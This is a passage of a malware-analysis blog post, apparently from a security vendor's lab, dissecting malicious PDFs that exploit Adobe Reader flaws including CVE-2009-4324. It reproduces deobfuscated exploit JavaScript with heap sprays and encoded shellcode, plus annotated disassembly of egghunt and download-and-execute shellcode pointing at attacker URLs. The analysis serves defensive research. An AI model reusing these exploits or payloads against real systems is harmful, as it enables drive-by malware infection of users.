O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; }A_p_p7p2__u2x[O86U_8] = aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050&
[egghunt…] %u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc
[shellcode…] %u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);

 

Editorial About Parsing PDFs

Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots() call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.

To fully parse, not only must you do everything in these:

But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)

 

Q: So how does FireEye parse PDFs?
A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.

Oh this is telling...


ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).
ISO 32000-1:2008 does not specify the following:

  • specific processes for converting paper or electronic documents to the PDF format;
  • specific technical design, user interface or implementation or operational details of rendering;
  • specific physical methods of storing these documents such as media and storage conditions;
  • methods for validating the conformance of PDF files or readers;
  • required computer hardware and/or operating system.

 

Shellcode

There are two chunks of shellcode; One is Skape's old Egghunt shellcode (Using the egg value 0x9050905090509050), and a common URLMon download and winexec() shellcode (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)

Egghunt Shellcode

Just go read this: egghunt.c

00000000  90                nop
00000001  90                nop
00000002  90                nop
00000003  90                nop
00000004  90                nop
00000005  90                nop
00000006  EB21              jmp short 0x29
00000008  59                pop ecx
00000009  B850905090        mov eax,0x90509050
0000000E  51                push ecx
0000000F  6AFF              push byte -0x1
00000011  33DB              xor ebx,ebx
00000013  648923            mov [fs:ebx],esp
00000016  6A02              push byte +0x2
00000018  59                pop ecx
00000019  8BFB              mov edi,ebx
0000001B  F3AF              repe scasd
0000001D  7507              jnz 0x26
0000001F  FFE7              jmp edi
00000021  6681CBFF0F        or bx,0xfff
00000026  43                inc ebx
00000027  EBED              jmp short 0x16
00000029  E8DAFFFFFF        call 0x8
0000002E  6A0C              push byte +0xc
00000030  59                pop ecx
00000031  8B040C            mov eax,[esp+ecx]
00000034  B1B8              mov cl,0xb8
00000036  83040806          add dword [eax+ecx],byte +0x6
0000003A  58                pop eax
0000003B  83C410            add esp,byte +0x10
0000003E  50                push eax
0000003F  33C0              xor eax,eax
00000041  C3                ret

 

Download to File and Exec

I started to comment this, because I haven't actually found a marked up version of it via Google, but I was also supposed to have had this blog post done last week. So I'll document the rest of this at a later date. There are actually two samples here, but they only differ by a few instructions, so I've written in the differences in inline comments.

00000000  90                nop
00000001  90                nop
00000002  90                nop
00000003  90                nop
00000004  90                nop
00000005  90                nop
00000006  90                nop
00000007  90                nop
00000008  90                nop
00000009  90                nop
0000000A  E800000000        call 0xf        ; Leave EIP on the stack for later
0000000F  EB00              jmp short 0x11  ; i.e. the base address of this shellcode
00000011  E9FC000000        jmp 0x112       ; Get EIP again, base address of offset 0x112
00000016  5F                pop edi         ; EDI = EIP = The end
00000017  64A130000000      mov eax,[fs:0x30] ; PEB
0000001D  780C              js 0x2b           ; Check if Windows 95
0000001F  8B400C            mov eax,[eax+0xc] ; PROCESS_MODULE_INFO
00000022  8B701C            mov esi,[eax+0x1c] ; *flink
00000025  AD                lodsd              ; EAX = *blink
00000026  8B6808            mov ebp,[eax+0x8]  ; EBP = kernel32 module base address
00000029  EB09              jmp short 0x34
0000002B  8B4034            mov eax,[eax+0x34] ; Windows 9x boilerplate
0000002E  8D407C            lea eax,[eax+0x7c] ; Because everyone just copies everyone
00000031  8B683C            mov ebp,[eax+0x3c] ; else's (Skape's) shellcode
00000034  8BF7              mov esi,edi        ; ESI = The end, and beginning of hashes
00000036  6A04              push byte +0x4
00000038  59                pop ecx            ; ECX = 0x00000004
00000039  E88F000000        call 0xcd          ; find_functions
0000003E  E2F9              loop 0x39
00000040  686F6E0000        push dword 0x6e6f     ; 
00000045  6875726C6D        push dword 0x6d6c7275 ; "urlmon"
0000004A  54                push esp
0000004B  FF16              call near [esi]       ; loadLibraryA
0000004D  8BE8              mov ebp,eax
0000004F  E879000000        call 0xcd
00000054  8BD7              mov edx,edi
00000056  47                inc edi               ;
00000057  803F00            cmp byte [edi],0x0
0000005A  75FA              jnz 0x56              ; End of string
0000005C  47                inc edi               ; Skip null
0000005D  57                push edi              ; Beginning of next string
0000005E  47                inc edi               ;
0000005F  803F00            cmp byte [edi],0x0
00000062  75FA              jnz 0x5e
00000064  8BEF              mov ebp,edi           ; EDI points to end of string
00000066  5F                pop edi               ; EDI Beginning of string
00000067  33C9              xor ecx,ecx
00000069  81EC04010000      sub esp,0x104         ; make 260 bytes of space
0000006F  8BDC              mov ebx,esp
; This is the first instruction that these two samples diverge on:
; Only one of them has this.
; 00000071  83C30C            add ebx,byte +0xc    ; Leave 12 bytes of space for "regsrv32 -s "
00000071  51                push ecx              ; 0
00000072  52                push edx              ;
00000073  53                push ebx              ; End of string
00000074  6804010000        push dword 0x104      ; 260
00000079  FF560C            call near [esi+0xc]   ; GetTempPathA
0000007C  5A                pop edx
0000007D  59                pop ecx               ; 
0000007E  51                push ecx              ; jump target from 0xC8
0000007F  52                push edx
00000080  8B02              mov eax,[edx]
00000082  53                push ebx              ; Filename
00000083  43                inc ebx
00000084  803B00            cmp byte [ebx],0x0
00000087  75FA              jnz 0x83                       ; EBX points to end
00000089  817BFC2E657865    cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?
; The other version of this shellcode uses ".dll" rather than ".exe"
; 0000008C  817BFC2E646C6C    cmp dword [ebx-0x4],0x6c6c642e ; ".dll"
00000090  7503              jnz 0x95
00000092  83EB08            sub ebx,byte +0x8
00000095  8903              mov [ebx],eax                  ; Doesn't end with ".exe"
00000097  C743042E657865    mov dword [ebx+0x4],0x6578652e ; So append ".exe"
; Again with the DLL
;         C743042E646C6C    mov dword [ebx+0x4],0x6c6c642e ; ".dll"
0000009E  C6430800          mov byte [ebx+0x8],0x0         ; ".exe\0"
000000A2  5B                pop ebx
000000A3  8AC1              mov al,cl
000000A5  0430              add al,0x30
000000A7  884500            mov [ebp+0x0],al
000000AA  33C0              xor eax,eax
000000AC  50                push eax                ; NULL lpfnCB
000000AD  50                push eax                ; NULL dwReserved
000000AE  53                push ebx                ; szFileName
000000AF  57                push edi                ; szURL
000000B0  50                push eax                ; NULL pCaller
000000B1  FF5610            call near [esi+0x10]    ; URLDownloadToFileA
000000B4  83F800            cmp eax,byte +0x0       ; Download ok?
000000B7  7506              jnz 0xbf
000000B9  6A01              push byte +0x1          ; SW_SHOWNORMAL maybe?
; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name
; 83EB0C            sub ebx,byte +0xc              ; back up 12 bytes from beginning
; C70372656773      mov dword [ebx],0x73676572     ; "regs"
; C7430476723332    mov dword [ebx+0x4],0x32337276 ; "vr32"
; C74308202D7320    mov dword [ebx+0x8],0x20732d20 ; " -s "
000000BB  53                push ebx                ; Command Line
000000BC  FF5604            call near [esi+0x4]     ; WinExec
000000BF  5A                pop edx
000000C0  59                pop ecx
000000C1  83C204            add edx,byte +0x4
000000C4  41                inc ecx
000000C5  803A00            cmp byte [edx],0x0
000000C8  75B4              jnz 0x7e
000000CA  FF5608            call near [esi+0x8]     ; ExitProcess
find_functions:
000000CD  51                push ecx                ; 0x00000004
000000CE  56                push esi                ; The end (0x117)
000000CF  8B753C            mov esi,[ebp+0x3c]      ; PE header VMA
000000D2  8B742E78          mov esi,[esi+ebp+0x78]  ; Export table relative offset
; This is just an alternative coding of the same instruction, X86 is full of things like this
; 8B743578          mov esi,[ebp+esi+0x78]
000000D6  03F5              add esi,ebp             ; Export table VMA
000000D8  56                push esi
000000D9  8B7620            mov esi,[esi+0x20]      ; Names table relative offset
000000DC  03F5              add esi,ebp             ; esi = Names table VMA
000000DE  33C9              xor ecx,ecx             ;
000000E0  49                dec ecx                 ; ecx = 0xffffffff
000000E1  41                inc ecx                 ; jmp from 0xF8
000000E2  AD                lodsd                   ; eax = *esi = *Names table VMA
000000E3  03C5              add eax,ebp
000000E5  33DB              xor ebx,ebx
000000E7  0FBE10            movsx edx,byte [eax]    ; next entry
000000EA  3AD6              cmp dl,dh               ; check for NULL (at end of table)
; Another alternative coding. This seems to imply the original source was symbolic, 
; and (re)compiled/assembled to create the other version.
; 38F2              cmp dl,dh
000000EC  7408              jz 0xf6
000000EE  C1CB0D            ror ebx,0xd             ; compute hash
000000F1  03DA              add ebx,edx             ; compute hash ebx = accumulator
000000F3  40                inc eax
000000F4  EBF1              jmp short 0xe7
000000F6  3B1F              cmp ebx,[edi]
000000F8  75E7              jnz 0xe1
000000FA  5E                pop esi
000000FB  8B5E24            mov ebx,[esi+0x24]      ; Ordinals table relative offset
000000FE  03DD              add ebx,ebp             ; Ordinals table VMA
00000100  668B0C4B          mov cx,[ebx+ecx*2]      ; Extrapolate function's ordinal
00000104  8B5E1C            mov ebx,[esi+0x1c]      ; Address table relative offset
00000107  03DD              add ebx,ebp             ; Address table VMA
00000109  8B048B            mov eax,[ebx+ecx*4]     ; Extract the relative function offset from its ordinal
0000010C  03C5              add eax,ebp             ; Function VMA
0000010E  AB                stosd                   ; *edi = eax
0000010F  5E                pop esi
00000110  59                pop ecx
00000111  C3                ret
00000112  E8FFFEFFFF        call 0x100000016           ; Get EIP *here = End of shellcode
00000117 db 8e 4e 0e ec             ; [ESI+0]  0xec0e4e8e LoadLibraryA
0000011B db 98 fe 8a 0e             ; [ESI+4]  0x0e8afe98 WinExec 
0000011F db 7e d8 e2 73             ; [ESI+8]  0x73e2d87e ExitProcess
00000123 db 33 ca 8a 5b             ; [ESI+C]  0x5b8aca33 GetTempPathA
00000127 db 36 1a 2f 70             ; [ESI+10] 0x702f1a36 URLDownloadToFileA
0000012B db 6b 74 47 6f 00          ; "ktGo" ??
;Alt:    db 6c 4c 70 6f 00          ; "lLpo" ??
0000014A                                 68 74 74 70 3a 2f  ;           http:/
00000150  2f 67 6f 6f 67 6c 65 2e  63 6f 6d 2e 61 6e 61 6c  ; /google.com.anal
00000160  79 74 69 63 73 2e 65 69  63 79 78 74 61 65 63 75  ; ytics.eicyxtaecu
00000170  6e 2e 63 6f 6d 2f 6e 74  65 2f 41 56 4f 52 50 31  ; n.com/nte/AVORP1
00000180  54 52 45 53 54 31 31 2e  70 79 2f 65 48 39 39 39  ; TREST11.py/eH999
00000190  61 34 35 35 31 56 30 31  30 30 66 30 37 30 30 30  ; a4551V0100f07000
000001a0  36 52 30 30 30 30 30 30  30 30 31 30 32 54 64 32  ; 6R00000000102Td2
000001b0  64 63 63 61 37 64 32 30  31 6c 30 34 30 39 4b 39  ; dcca7d201l0409K9
000001c0  31 61 36 38 39 34 38 33  32 30 00 00              ; 1a68948320..
00000130 db 68 74 74 70 3a 2f 2f 6c  61 72 79 6a 75 2e 69 6e ; http://laryju.in
00000140 db 66 6f 2f 63 67 69 2d 62  69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH
00000150 db 33 66 63 37 66 34 39 65  56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06
00000160 db 30 30 30 36 52 30 30 30  30 30 30 30 30 31 30 32 ; 0006R00000000102
00000170 db 54 36 63 64 63 38 39 37  38 32 30 31 6c 30 34 30 ; T6cdc8978201l040
00000180 db 39 00                                            ; 9.

Breaking News

So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.
[The URL will be something like http://<ip address>/bbh/pdf.php .]

This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).

You should all know how to read this by now.

(Unless you've skipped over this entire post to here.)

I'm using 323cd2b18026019ab8364efa96893062 for this example

The Javascript segments are referenced like this in the PDF.

9 0 obj
<</Creator (Adobe)
/Title 5 0 R
/Producer 14 0 R
/Author 51 0 R
/CreationDate (D:20080924194756)
>>
endobj

 

This object (the info.Author) has the exploit:


51 0 obj
<<
/Filter /FlateDecode
/Length 2630
>>
stream

Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]

endstream
endobj

If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:
perl -ne 's/lka1//g; print(pack("H*",$_));'

 

 


31 0 obj
<< /S /JavaScript /JS 32 0 R >>
endobj
32 0 obj
<<
/Filter /FlateDecode

/Length 159
>>
stream

Uncompressed:


var xyuvam = 'lka';
var z = unescape;
var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';
eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');
eval('var bu'+'hae'+'ca = ev'+'a'+'l;');


endstream
endobj

 

 


33 0 obj
<< /S /JavaScript /JS 34 0 R >>
endobj
34 0 obj
<<
/Filter /FlateDecode
/Length 102
>>
stream
Uncompressed:


buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');
var poxyunavse = 'xyuznaet.re';


endstream
endobj

Obviously,%66%6f%2e%61%75%74 is fo.aut, so glueing that all together, it becomes this.info.author;, otherwise known as Object #51 (See elsewhere).

 

 


35 0 obj
<< /S /JavaScript /JS 36 0 R >>
endobj
36 0 obj
<<
/Filter /FlateDecode
/Length 88
>>
stream
Uncompressed:


var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;
var xxx = buhaeca(lkaa);


endstream
endobj

 

 


37 0 obj
<< /S /JavaScript /JS 38 0 R >>
endobj
38 0 obj
<<
/Filter /FlateDecode
/Length 60
>>
stream
Uncompressed:


var ietoktoewe = z(unescape(xxx));
buhaeca(ietoktoewe);


endstream
endobj

 

So, one of the odd things about this PDF, is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from 123 00 R to something easier to remember, like /Bob.)

48 0 obj
<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]
>>
endobj

 

Also Object #5 and Object #14 are empty. This is info.Title and info.Producer respectively.

5 0 obj
<< 
/Filter /FlateDecode 
/Length 0 
>>
stream
endstream
endobj
14 0 obj
<< 
/Filter /FlateDecode 
/Length 0
>>
stream
endstream
endobj

 

51 0 R Decoded

 


function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34
%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B
%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324
%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B
%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455
%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF
%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F
%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e
%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273
%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",
new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)
{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040
%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44
%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150
%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56
%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865
%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56
%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60
%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073
%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(
var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78
%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455
%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA
%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA
%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D
%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856
%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862
%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(
var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');
var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();

 


And these seem to be on this exact same topic

http://isc.sans.org/diary.html?storyid=7906
http://www.inreverse.net/?p=549


¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.
² Neosploit and Mebroot go together like peanut butter and chocolate.
³ It looks almost exactly like the simple example in Annex H of the PDF specification.
4 This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.



Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

4 thoughts on “PDF Obfuscation using getAnnots()

  1. Regarding neosploit, I received an ‘o’ type which did not deliver a pdf, but MIME application/octet-stream starting with a PK header and Main.class content. What is this and how does it get executed?

  2. Anything that starts with a “PK” header, and has a “main.class” in it is a Java archive (.JAR file). Without looking at your file, I’m going to make an educated guess that it’s probably CVE-2008-5353. However, all of the CVE-2008-5353 samples I’ve looked at so far (which is not a lot), don’t contain a “main.class”.
    In case my html links get stripped:
    http://en.wikipedia.org/wiki/JAR_%28file_format%29
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353

  3. Ok, I’ve looked into this now… The JAR that file that Neosploit is sending out is MD5:7ea387bc8e66cadc85748e4d9f809aaa And at immediate glance, I’m not sure why… This is the Java Class in question:
    (Created at about 2009-11-24 16:39:08 )
    00000000 ca fe ba be 00 00 00 30 00 0e 0a 00 03 00 0b 07 |…….0……..|
    00000010 00 0c 07 00 0d 01 00 06 3c 69 6e 69 74 3e 01 00 |………init…| ; edited for lt, gt symbols
    00000020 03 28 29 56 01 00 04 43 6f 64 65 01 00 0f 4c 69 |.()V…Code…Li|
    00000030 6e 65 4e 75 6d 62 65 72 54 61 62 6c 65 01 00 04 |neNumberTable…|
    00000040 69 6e 69 74 01 00 0a 53 6f 75 72 63 65 46 69 6c |init…SourceFil|
    00000050 65 01 00 09 4d 61 69 6e 2e 6a 61 76 61 0c 00 04 |e…Main.java…|
    00000060 00 05 01 00 04 4d 61 69 6e 01 00 12 6a 61 76 61 |…..Main…java|
    00000070 2f 61 70 70 6c 65 74 2f 41 70 70 6c 65 74 00 21 |/applet/Applet.!|
    00000080 00 02 00 03 00 00 00 00 00 02 00 01 00 04 00 05 |…………….|
    00000090 00 01 00 06 00 00 00 1d 00 01 00 01 00 00 00 05 |…………….|
    000000a0 2a b7 00 01 b1 00 00 00 01 00 07 00 00 00 06 00 |*……………|
    000000b0 01 00 00 00 0c 00 01 00 08 00 05 00 01 00 06 00 |…………….|
    000000c0 00 00 19 00 00 00 01 00 00 00 01 b1 00 00 00 01 |…………….|
    000000d0 00 07 00 00 00 06 00 01 00 00 00 11 00 01 00 09 |…………….|
    000000e0 00 00 00 02 00 0a |……|
    000000e6
    [All HTML tags are stripped from these comments, so I can't wrap a set of pre/pre tags around this. It also strips out all greater-than signs and less-than signs, and any ampersand-name-semicolon codes.]
    Virus Total says zero A/V scanners detect it as malicious:
